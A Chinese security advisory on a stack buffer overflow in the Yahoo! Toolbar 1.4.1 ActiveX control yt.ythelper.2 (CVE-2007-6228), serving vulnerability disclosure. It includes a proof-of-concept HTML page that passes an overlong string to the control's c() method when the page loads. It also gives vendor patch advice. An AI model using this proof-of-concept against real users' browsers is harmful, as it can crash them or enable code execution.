发布日期：2007-11-29
更新日期：2007-12-07

受影响系统：

Yahoo! Toolbar 1.4.1

描述：

---

BUGTRAQ  ID: 26656
CVE(CAN) ID: CVE-2007-6228

Yahoo! Toolbar是一个IE插件，能够通过嵌入IE的工具栏帮助快速使用Yahoo搜索引擎、收发Yahoo电子邮件等操作。

Yahoo! Toolbar的ActiveX控件实现上存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制用户系统。

Yahoo! Toolbar所安装的yt.ythelper.2 ActiveX控件没有正确地验证对c()方式所传送的参数，如果用户受骗访问了恶意网页并向该方式传送了超长参数的话，就可能触发栈溢出，导致浏览器崩溃或执行任意指令。

<*来源：Elazar Broad （elazarb@earthlink.net）
  
  链接：http://lists.grok.org.uk/pipermail/full-disclosure/2007-November/058725.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head>
  <script language="JavaScript" DEFER>
    function Check() {
    var s = "AAAA";

     while (s.length < 999999) s=s+s;

     var obj = new ActiveXObject("yt.ythelper.2"); //{02478D38-C3F9-4EFB-9B51-7695ECA05670}
      obj.c(s);
   }
  </script>

</head>
<body onload="JavaScript: return Check();">
</body>
</html>

建议：

---

厂商补丁：

Yahoo!
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://toolbar.yahoo.com/

浏览次数：3338
严重程度：0（网友投票）